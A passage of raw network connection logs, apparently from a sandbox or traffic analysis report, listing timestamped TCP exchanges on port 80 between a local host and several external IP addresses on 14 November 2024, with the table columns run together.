                                                                                                                                                  Nov 14, 2024 15:40:10.018678904 CET8049952199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:10.018989086 CET4995280192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:10.019260883 CET8049952199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:10.019325972 CET4995280192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:10.903340101 CET4995280192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:11.922218084 CET4996680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:11.927505970 CET8049966199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:11.929358006 CET4996680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:11.940773010 CET4996680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:11.945796013 CET8049966199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:12.583775043 CET8049966199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:12.583887100 CET8049966199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:12.583959103 CET4996680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:12.584588051 CET8049966199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:12.584638119 CET4996680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:13.450758934 CET4996680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:14.468909979 CET4997780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:14.474256039 CET8049977199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:14.474342108 CET4997780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:14.487375975 CET4997780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:14.492425919 CET8049977199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:14.492477894 CET8049977199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:15.134236097 CET8049977199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:15.134362936 CET8049977199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:15.134435892 CET4997780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:15.134670973 CET8049977199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:15.134722948 CET4997780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:15.997220993 CET4997780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.016041040 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.081875086 CET8049986199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:17.081989050 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.088653088 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.093952894 CET8049986199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:17.707554102 CET8049986199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:17.707871914 CET8049986199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:17.708086967 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.708336115 CET8049986199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:17.708400011 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.711007118 CET4998680192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:17.716078997 CET8049986199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:23.045397043 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:23.050957918 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:23.051345110 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:23.102281094 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:23.107464075 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.058964014 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.058990002 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.059180021 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:24.059914112 CET8049987199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:24.059974909 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:24.606550932 CET4998780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.708422899 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.789990902 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:25.790076017 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.811752081 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:25.816819906 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.467685938 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.467741966 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.467808962 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:26.468099117 CET8049988199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:26.468147039 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:27.325694084 CET4998880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.345062017 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.351207972 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.351322889 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.362704992 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.367660999 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.367779016 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977226973 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977330923 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977421999 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:28.977924109 CET8049989199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:28.977998972 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:29.872339964 CET4998980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.890866995 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.896147966 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:30.896333933 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.902249098 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:30.907295942 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521033049 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521059036 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521231890 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:31.521315098 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:31.521364927 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:31.525042057 CET4999180192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:31.530019045 CET8049991199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:36.700817108 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:36.705835104 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:36.705904007 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:36.726937056 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:36.732136011 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:37.381683111 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:37.419275045 CET8049992209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:37.419377089 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:38.231914043 CET4999280192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.251003027 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.256179094 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.256274939 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.269735098 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:39.275091887 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.943690062 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.982498884 CET8049993209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:39.983333111 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:40.778867960 CET4999380192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.797683001 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.803236008 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:41.803376913 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.814821959 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:41.819819927 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:41.819856882 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:42.497665882 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:42.535343885 CET8049994209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:42.535398960 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:43.325735092 CET4999480192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.346864939 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.351949930 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:44.354327917 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.361145020 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:44.366158962 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:45.028980970 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:45.067054033 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:45.067228079 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:45.068142891 CET4999580192.168.2.5209.74.64.58
                                                                                                                                                  Nov 14, 2024 15:40:45.073160887 CET8049995209.74.64.58192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:50.557662010 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:50.562937975 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:50.563024998 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:50.575277090 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:50.580291986 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:51.547610044 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:51.591701984 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:51.731605053 CET804999647.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:51.733167887 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:52.095073938 CET4999680192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.109834909 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.115282059 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:53.115371943 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.125857115 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:53.130974054 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:54.075934887 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:54.125369072 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:54.261301041 CET804999747.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:54.263056993 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:54.638571024 CET4999780192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.659028053 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.664144993 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:55.666465998 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.679090023 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:55.684777021 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:55.685309887 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:56.647399902 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:56.700999975 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:56.833965063 CET804999847.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:56.834028959 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:57.185448885 CET4999880192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.207122087 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.213125944 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:58.213304043 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.223109007 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:58.228131056 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:59.211580992 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:59.263566971 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:59.397878885 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:59.398011923 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:59.398811102 CET4999980192.168.2.547.242.89.146
                                                                                                                                                  Nov 14, 2024 15:40:59.403642893 CET804999947.242.89.146192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:04.441313028 CET5000080192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:04.446440935 CET8050000128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:04.446552992 CET5000080192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:04.457319021 CET5000080192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:04.462511063 CET8050000128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:05.990134001 CET5000080192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:06.016897917 CET8050000128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:06.017762899 CET5000080192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:07.006834030 CET5000180192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:07.012171030 CET8050001128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:07.012247086 CET5000180192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:07.024276972 CET5000180192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:07.029216051 CET8050001128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:08.529474974 CET5000180192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:08.580580950 CET8050001128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:08.638323069 CET8050001128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:08.638381958 CET5000180192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:09.547739983 CET5000280192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:09.567888021 CET8050002128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:09.568034887 CET5000280192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:09.579377890 CET5000280192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:09.584496021 CET8050002128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:09.584527969 CET8050002128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:11.092268944 CET5000280192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:11.097965002 CET8050002128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:11.098037004 CET5000280192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:12.110929966 CET5000380192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:12.116067886 CET8050003128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:12.116159916 CET5000380192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:12.122459888 CET5000380192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:12.127616882 CET8050003128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:17.271413088 CET8050003128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:17.326791048 CET5000380192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:17.367966890 CET8050003128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:17.368241072 CET5000380192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:17.381890059 CET5000380192.168.2.5128.65.195.180
                                                                                                                                                  Nov 14, 2024 15:41:17.388921976 CET8050003128.65.195.180192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:22.463815928 CET5000480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:22.469046116 CET8050004217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:22.469237089 CET5000480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:22.481664896 CET5000480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:22.487107992 CET8050004217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:23.281769991 CET8050004217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:23.326697111 CET5000480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:23.389949083 CET8050004217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:23.390125036 CET5000480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:23.995171070 CET5000480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:25.005222082 CET5000580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:25.010920048 CET8050005217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:25.010996103 CET5000580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:25.022552013 CET5000580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:25.028088093 CET8050005217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:25.854955912 CET8050005217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:25.906035900 CET5000580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:25.966475964 CET8050005217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:25.966579914 CET5000580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:26.530658007 CET5000580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:27.548041105 CET5000680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:27.554433107 CET8050006217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:27.554639101 CET5000680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:27.567817926 CET5000680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:27.573267937 CET8050006217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:27.573354959 CET8050006217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:28.371813059 CET8050006217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:28.420603991 CET5000680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:28.482564926 CET8050006217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:28.482904911 CET5000680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:29.077023983 CET5000680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:30.095839977 CET5000780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:30.101289988 CET8050007217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:30.101394892 CET5000780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:30.107841015 CET5000780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:30.113192081 CET8050007217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:30.915450096 CET8050007217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:30.915812016 CET8050007217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:30.915832043 CET8050007217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:30.915910006 CET5000780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:30.967510939 CET5000780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:31.025813103 CET8050007217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:31.026057959 CET5000780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:31.026742935 CET5000780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:41:31.031539917 CET8050007217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:36.052001953 CET5000880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:36.057706118 CET80500083.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:36.057969093 CET5000880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:36.071978092 CET5000880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:36.076982975 CET80500083.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:37.577516079 CET5000880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:37.583367109 CET80500083.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:37.586693048 CET5000880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:38.595141888 CET5000980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:38.600431919 CET80500093.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:38.600649118 CET5000980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:38.611922979 CET5000980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:38.617307901 CET80500093.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:39.237077951 CET80500093.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:39.237277985 CET5000980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:40.124552965 CET5000980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:40.129513025 CET80500093.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:41.148587942 CET5001080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:41.293114901 CET80500103.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:41.293210030 CET5001080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:41.306106091 CET5001080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:41.311516047 CET80500103.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:41.311783075 CET80500103.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:41.920639038 CET80500103.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:41.924216986 CET5001080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:42.811476946 CET5001080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:42.816803932 CET80500103.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:43.868455887 CET5001180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:43.874223948 CET80500113.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:43.876144886 CET5001180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:43.911240101 CET5001180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:43.916975975 CET80500113.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:44.503148079 CET80500113.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:44.503407001 CET80500113.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:44.503703117 CET5001180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:44.507471085 CET5001180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:44.512501955 CET80500113.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:49.688261986 CET5001280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:49.693258047 CET80500123.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:49.693358898 CET5001280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:49.704267025 CET5001280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:49.709212065 CET80500123.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:50.352672100 CET80500123.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:50.356400013 CET5001280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:51.217916965 CET5001280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:51.223120928 CET80500123.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:52.236340046 CET5001380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:52.241867065 CET80500133.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:52.241971970 CET5001380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:52.251157999 CET5001380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:52.256171942 CET80500133.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:52.860915899 CET80500133.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:52.860975981 CET5001380192.168.2.53.33.130.190
